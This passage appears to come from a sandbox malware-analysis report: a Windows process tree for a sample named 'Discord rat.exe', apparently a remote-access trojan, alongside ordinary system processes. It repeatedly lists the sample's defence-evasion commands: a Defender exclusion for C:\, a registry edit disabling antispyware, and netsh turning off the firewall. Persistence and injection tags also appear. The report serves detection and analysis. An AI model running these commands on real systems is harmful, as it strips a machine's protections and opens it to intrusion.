  C:\Windows\System32\dllhost.exe /Processid:{d5122826-465e-4fa2-946c-4966390957b2}
  2⤵
  PID:6624
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4d521fd7-901c-48bf-aafe-d23d6e5dea0d}
  2⤵
  PID:7060
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2bfa65d3-08fa-4b23-a09e-830cdb4b0b8e}
  2⤵
  PID:936
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{21b55cc8-2c9e-45e2-9a2e-2fb675b9b660}
  2⤵
  PID:4712
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{13b665c7-ca18-4a14-9ff0-09d03b9015ed}
  2⤵
  PID:6412
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{214c80b4-f8aa-407e-a515-e313e7d32496}
  2⤵
  PID:5356
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c2236f68-9b9c-4083-b3f0-4b27f06bae05}
  2⤵
  PID:1704
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{afc05db2-4de4-4091-9941-2a8bab4e4751}
  2⤵
  PID:504
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f76d261b-f088-47a5-bf73-ff0571fc8d21}
  2⤵
  PID:6260
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dc875677-da3f-44b8-b376-7da2f15db03d}
  2⤵
  PID:7024
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2b270fdc-4abe-4d40-bbf1-eda816fcd5ea}
  2⤵
  PID:4112
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c0bc0f90-a8ab-4f98-ae84-730c04e68149}
  2⤵
  PID:6712
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{49ca37de-a958-4f05-9a86-45101d301f5a}
  2⤵
  PID:4960
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5fa1e431-bd84-4118-8f46-142b534dbe29}
  2⤵
  PID:992
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3efa9245-e2aa-49d7-9f5c-c2df802f95e8}
  2⤵
  PID:5500
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ea26c613-7a8c-4ce5-8b36-0013aabcd491}
  2⤵
  PID:2180
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{07d31efc-4156-4395-954c-afa1c1938c0f}
  2⤵
  PID:348
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7348fd6b-afbd-482d-8902-4623e9b3aa35}
  2⤵
  PID:7992
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3bf6efa4-90a5-49ff-8e23-f9f5e891b4c9}
  2⤵
  PID:8144
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{17a5e33f-9f11-4f6d-bce6-6b5098ea9c2d}
  2⤵
  PID:5892
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1e9bf828-e2ed-4050-84b7-547fae202a6e}
  2⤵
  PID:6808
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6c657f05-f9f1-4c69-86b0-b4e32f2bba15}
  2⤵
  PID:2808
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{56c8eefb-b941-42bb-a716-1bc63d0b15df}
  2⤵
  PID:7640
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fc01dce7-0001-4e70-a9fd-d560e47e362a}
  2⤵
  PID:676
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{104875d6-be5e-4c66-bf54-d7d33ed5ae22}
  2⤵
  PID:800
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b0e9e47d-550a-4e87-aee1-2405ca55f0dc}
  2⤵
  PID:6396
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fb22fa60-e32c-4873-bf7a-1760cd429be0}
  2⤵
  PID:8532
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a139fff5-623f-4345-a02d-f04007148330}
  2⤵
  PID:812
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c4d3acb1-ed66-4417-9ecf-0ec1bb21160d}
  2⤵
  PID:8772
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bdc1246e-9e20-4cbe-a04a-7cb4addb6ada}
  2⤵
  PID:6348
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{226045ef-9690-4300-b268-190b893ba96b}
  2⤵
  PID:7396
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{be8d14f6-8092-41fe-852f-26a0f13db903}
  2⤵
  PID:8724
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f4a7f72b-665d-4b06-9bd0-7b045a227f3e}
  2⤵
  PID:592

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1084
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3060

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1120

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1256

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1356
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2960

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1884

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1996

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
- Modifies data under HKEY_USERS
PID:2304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2448

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2968

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2932

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3308
- C:\Users\Admin\AppData\Local\Temp\Discord rat.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord rat.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:804
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2908
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4628
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2100
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1068
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4952
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:192
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:504
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:924
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5068
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4372
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:900
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3860
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2044
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4176
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5472
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5236
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5124
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5356
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5576
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5368
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1428
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:6016
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6028
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6132
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5260
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4232
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:348
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:6040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3340
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2564
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5152
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2820
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5480
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5420
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5072
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5428
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4624
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:924
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5732
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1372
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5932
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5848
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2492
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:800
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5960
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2752
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3820
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4672
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4704
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6016
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5652
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2332
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4496
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4500
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5688
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5648
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:644
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5020
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1504
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3096
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3340
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5528
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5152
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5684
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3296
  - - C:\Windows\System32\Conhost.exe
